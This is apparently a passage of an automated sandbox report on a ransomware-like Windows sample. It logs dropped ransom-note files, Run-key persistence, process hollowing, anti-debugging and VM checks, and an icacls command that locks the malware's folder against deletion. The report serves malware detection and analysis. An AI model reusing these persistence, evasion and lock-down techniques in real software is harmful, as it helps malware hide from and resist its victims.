        Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\\Micros source: tsnsd8pOvn.exe, 00000007.00000003.3348757761.0000000003179000.00000004.00000020.00020000.00000000.sdmp, tsnsd8pOvn.exe, 00000007.00000002.3370588549.0000000003178000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: d:\dbs\sh\odct\1105_210049_0\client\onedrive\Setup\Standalone\exe\obj\i386\OneDriveSetup.pdb source: wct425E.tmp.7.dr
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\ggZ source: tsnsd8pOvn.exe, 00000007.00000003.3348783123.0000000003118000.00000004.00000020.00020000.00000000.sdmp, tsnsd8pOvn.exe, 00000007.00000002.3370588549.0000000003118000.00000004.00000020.00020000.00000000.sdmp

        Data Obfuscation

        barindex
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeUnpacked PE file: 2.2.tsnsd8pOvn.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeUnpacked PE file: 7.2.tsnsd8pOvn.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeUnpacked PE file: 8.2.tsnsd8pOvn.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeUnpacked PE file: 11.2.tsnsd8pOvn.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeUnpacked PE file: 13.2.tsnsd8pOvn.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeUnpacked PE file: 2.2.tsnsd8pOvn.exe.400000.0.unpack
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeUnpacked PE file: 7.2.tsnsd8pOvn.exe.400000.0.unpack
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeUnpacked PE file: 8.2.tsnsd8pOvn.exe.400000.0.unpack
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeUnpacked PE file: 11.2.tsnsd8pOvn.exe.400000.0.unpack
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeUnpacked PE file: 13.2.tsnsd8pOvn.exe.400000.0.unpack
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 0_2_00412100 LoadLibraryW,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,0_2_00412100
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 0_2_0217B0AF push ecx; retf 0_2_0217B0B2
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 0_2_02238F05 push ecx; ret 0_2_02238F18
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 2_2_00428565 push ecx; ret 2_2_00428578
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 5_2_021670AF push ecx; retf 5_2_021670B2
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 5_2_02228F05 push ecx; ret 5_2_02228F18
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeCode function: 6_2_0208B0AF push ecx; retf 6_2_0208B0B2
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeCode function: 6_2_022D8F05 push ecx; ret 6_2_022D8F18

        Persistence and Installation Behavior

        barindex
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeSystem file written: C:\Users\user\AppData\Local\Temp\chrome.exeJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeSystem file written: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\LocalState\ThirdPartyNotice.htmlJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeFile created: C:\Users\user\AppData\Local\Temp\tmpF2E2.tmpJump to dropped file
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeFile created: C:\Users\user\AppData\Local\Temp\wct425E.tmpJump to dropped file
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeFile created: C:\Users\user\AppData\Local\Temp\chrome.exeJump to dropped file
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeFile created: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeJump to dropped file
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeFile created: C:\Users\user\Local Settings\Temp\chrome.exe.pcqq (copy)Jump to dropped file
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeFile created: C:\Users\user\Local Settings\Temp\tmpF2E2.tmp.pcqq (copy)Jump to dropped file
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeFile created: C:\Users\user\Local Settings\Temp\wct425E.tmp.pcqq (copy)Jump to dropped file
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeFile created: C:\_readme.txtJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeFile created: C:\$WinREAgent\_readme.txtJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeFile created: C:\$WinREAgent\Scratch\_readme.txtJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeFile created: C:\Users\user\_readme.txtJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SysHelperJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SysHelperJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 2_2_00481920 GetVersionExA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,CloseHandle,FreeLibrary,GlobalMemoryStatus,GetCurrentProcessId,2_2_00481920
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeProcess created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258" /deny *S-1-1-0:(OI)(CI)(DE,DC)
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 0_2_0217971C rdtsc 0_2_0217971C
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: _malloc,_malloc,_wprintf,_free,GetAdaptersInfo,_free,_malloc,GetAdaptersInfo,_sprintf,_wprintf,_wprintf,_free,2_2_0040E670
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\wct425E.tmpJump to dropped file
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\tmpF2E2.tmpJump to dropped file
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\chrome.exeJump to dropped file
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeDropped PE file which has not been started: C:\Users\user\Local Settings\Temp\chrome.exe.pcqq (copy)Jump to dropped file
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeDropped PE file which has not been started: C:\Users\user\Local Settings\Temp\tmpF2E2.tmp.pcqq (copy)Jump to dropped file
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeDropped PE file which has not been started: C:\Users\user\Local Settings\Temp\wct425E.tmp.pcqq (copy)Jump to dropped file
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_2-45119
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exe TID: 2448Thread sleep time: -139000s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exe TID: 6524Thread sleep count: 182 > 30Jump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 2_2_00410160 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose,2_2_00410160
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 2_2_0040F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose,2_2_0040F730
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 2_2_0040FB98 PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,FindNextFileW,FindClose,2_2_0040FB98
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeThread delayed: delay time: 139000Jump to behavior
        Source: user-PC-20231005-0829.log.7.drBinary or memory string: 10/05/2023 08:29:28.687OFFICECL (0x12cc)0x498Telemetry EventbiyhqMediumSendEvent {"EventName": "Office.System.SystemHealthMetadataDeviceConsolidated", "Flags": 33777031581908737, "InternalSequenceNumber": 551, "Time": "2023-10-05T06:29:18Z", "Rule": "120600.4", "AriaTenantToken": "cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521", "Contract": "Office.Legacy.Metadata", "Data.ProcTypeText": "x64", "Data.ProcessorCount": 2, "Data.NumProcShareSingleCore": 1, "Data.NumProcShareSingleCache": 1, "Data.NumProcPhysCores": 2, "Data.ProcSpeedMHz": 2000, "Data.IsLaptop": false, "Data.IsTablet": false, "Data.RamMB": 4096, "Data.PowerPlatformRole": 1, "Data.SysVolSizeMB": 50000, "Data.DeviceManufacturer": "VMWare, Inc.", "Data.DeviceModel": "VMware20,1", "Data.DigitizerInfo": 0, "Data.SusClientId": "097C77FB-5D5D-4868-860B-09F4E5B50A53", "Data.WindowsSqmMachineId": "92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A", "Data.ComputerSystemProductUuidHash": "pNpni+sgFme2AbL0FaUYvRnb6Aw=", "Data.DeviceProcessorModel": "Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz", "Data.HasSpectreFix": true, "Data.BootDiskType": "SSD"}
        Source: tsnsd8pOvn.exe, 00000002.00000002.2170674140.00000000006D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWCW
        Source: tsnsd8pOvn.exe, 00000007.00000002.3368804894.0000000000751000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW s{%SystemRoot%\system32\mswsock.dllxx
        Source: tsnsd8pOvn.exe, 00000002.00000002.2170674140.00000000006B8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
        Source: tsnsd8pOvn.exe, 00000002.00000002.2170674140.00000000006D5000.00000004.00000020.00020000.00000000.sdmp, tsnsd8pOvn.exe, 00000002.00000002.2170674140.0000000000678000.00000004.00000020.00020000.00000000.sdmp, tsnsd8pOvn.exe, 00000007.00000002.3368804894.00000000007B1000.00000004.00000020.00020000.00000000.sdmp, tsnsd8pOvn.exe, 00000008.00000002.3368713688.0000000000726000.00000004.00000020.00020000.00000000.sdmp, tsnsd8pOvn.exe, 00000008.00000003.2250953642.0000000000726000.00000004.00000020.00020000.00000000.sdmp, tsnsd8pOvn.exe, 00000008.00000002.3368713688.0000000000698000.00000004.00000020.00020000.00000000.sdmp, tsnsd8pOvn.exe, 0000000B.00000002.2353811966.0000000000918000.00000004.00000020.00020000.00000000.sdmp, tsnsd8pOvn.exe, 0000000B.00000002.2353811966.00000000009A4000.00000004.00000020.00020000.00000000.sdmp, tsnsd8pOvn.exe, 0000000D.00000002.2424058932.0000000000773000.00000004.00000020.00020000.00000000.sdmp, tsnsd8pOvn.exe, 0000000D.00000002.2423974600.00000000006E8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: tsnsd8pOvn.exe, 00000002.00000002.2170674140.00000000006B8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}W
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeAPI call chain: ExitProcess graph end nodegraph_0-54183
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeAPI call chain: ExitProcess graph end nodegraph_0-54126
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeAPI call chain: ExitProcess graph end nodegraph_2-45121
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 0_2_0217971C rdtsc 0_2_0217971C
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 0_2_00410610 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00410610
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 0_2_00411502 InterlockedIncrement,__itow_s,__invoke_watson_if_error,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,__strftime_l,__invoke_watson_if_oneof,_wcscpy_s,__invoke_watson_if_error,_wcscpy_s,__invoke_watson_if_error,_wcscat_s,__invoke_watson_if_error,_wcscat_s,__invoke_watson_if_error,_wcscat_s,__invoke_watson_if_error,__snwprintf_s,__invoke_watson_if_oneof,_wcscpy_s,__invoke_watson_if_error,__invoke_watson_if_oneof,_wcscpy_s,__invoke_watson_if_error,GetFileType,_wcslen,WriteConsoleW,GetLastError,__invoke_watson_if_oneof,_wcslen,WriteFile,WriteFile,OutputDebugStringW,__itow_s,__invoke_watson_if_error,___crtMessageWindowW,0_2_00411502
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 0_2_00412100 LoadLibraryW,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,0_2_00412100
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 0_2_021780A3 push dword ptr fs:[00000030h]0_2_021780A3
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 0_2_02210042 push dword ptr fs:[00000030h]0_2_02210042
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 5_2_021640A3 push dword ptr fs:[00000030h]5_2_021640A3
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 5_2_02200042 push dword ptr fs:[00000030h]5_2_02200042
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeCode function: 6_2_020880A3 push dword ptr fs:[00000030h]6_2_020880A3
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeCode function: 6_2_022B0042 push dword ptr fs:[00000030h]6_2_022B0042
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 2_2_004278D5 GetProcessHeap,2_2_004278D5
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 0_2_0040C100 SetUnhandledExceptionFilter,0_2_0040C100
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 0_2_0041E5C0 _raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0041E5C0
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 0_2_00410610 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00410610
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 0_2_00404A20 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00404A20
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 2_2_004329EC SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_004329EC
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 2_2_004329BB SetUnhandledExceptionFilter,2_2_004329BB

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 0_2_02210110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess,0_2_02210110
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeMemory written: C:\Users\user\Desktop\tsnsd8pOvn.exe base: 400000 value starts with: 4D5AJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeMemory written: C:\Users\user\Desktop\tsnsd8pOvn.exe base: 400000 value starts with: 4D5AJump to behavior
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeMemory written: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exe base: 400000 value starts with: 4D5AJump to behavior
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeMemory written: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exe base: 400000 value starts with: 4D5A
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeMemory written: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exe base: 400000 value starts with: 4D5A
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 2_2_00419F90 GetCurrentProcess,GetLastError,GetLastError,SetPriorityClass,GetLastError,GetModuleFileNameW,PathRemoveFileSpecW,GetCommandLineW,CommandLineToArgvW,lstrcpyW,lstrcmpW,lstrcmpW,lstrcpyW,lstrcpyW,lstrcmpW,lstrcmpW,GlobalFree,lstrcpyW,lstrcpyW,OpenProcess,WaitForSingleObject,CloseHandle,Sleep,GlobalFree,GetCurrentProcess,GetExitCodeProcess,TerminateProcess,CloseHandle,lstrcatW,GetVersion,lstrcpyW,lstrcatW,lstrcatW,_memset,ShellExecuteExW,CreateThread,lstrlenA,lstrcatW,_malloc,lstrcatW,_memset,lstrcatW,MultiByteToWideChar,lstrcatW,lstrlenW,CreateThread,WaitForSingleObject,CreateMutexA,CreateMutexA,lstrlenA,lstrcpyA,_memmove,_memmove,_memmove,GetUserNameW,GetMessageW,GetMessageW,DispatchMessageW,TranslateMessage,TranslateMessage,DispatchMessageW,GetMessageW,PostThreadMessageW,PeekMessageW,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,CloseHandle,2_2_00419F90
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeProcess created: C:\Users\user\Desktop\tsnsd8pOvn.exe "C:\Users\user\Desktop\tsnsd8pOvn.exe"Jump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeProcess created: C:\Users\user\Desktop\tsnsd8pOvn.exe "C:\Users\user\Desktop\tsnsd8pOvn.exe" --Admin IsNotAutoStart IsNotTaskJump to behavior
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeProcess created: C:\Users\user\Desktop\tsnsd8pOvn.exe "C:\Users\user\Desktop\tsnsd8pOvn.exe" --Admin IsNotAutoStart IsNotTaskJump to behavior
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeProcess created: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exe C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exe --TaskJump to behavior
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeProcess created: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exe "C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exe" --AutoStart
        Source: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exeProcess created: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exe "C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exe" --AutoStart
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: 0_2_022380F6 cpuid 0_2_022380F6
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: GetLocaleInfoA,0_2_0041C380
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,0_2_02250AB6
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: ___crtGetLocaleInfoA,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,__invoke_watson,0_2_0223C8B7
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,_free,_free,0_2_0224394D
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeA,_free,_free,_free,_free,_free,_free,_free,_free,_free,0_2_022449EA
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,0_2_02243F87
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeA,_free,_free,_free,_free,_free,_free,_free,_free,_free,2_2_0043404A
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage,2_2_00438178
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,2_2_00440116
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,2_2_004382A2
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: GetLocaleInfoW,_GetPrimaryLen,2_2_0043834F
        Source: C:\Users\user\Desktop\tsnsd8pOvn.exeCode function: _memset,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromCountry,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,___crtDownlevelLCIDToLocaleName,___crtDownlevelLCIDToLocaleName,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,__itow_s,2_2_00438423
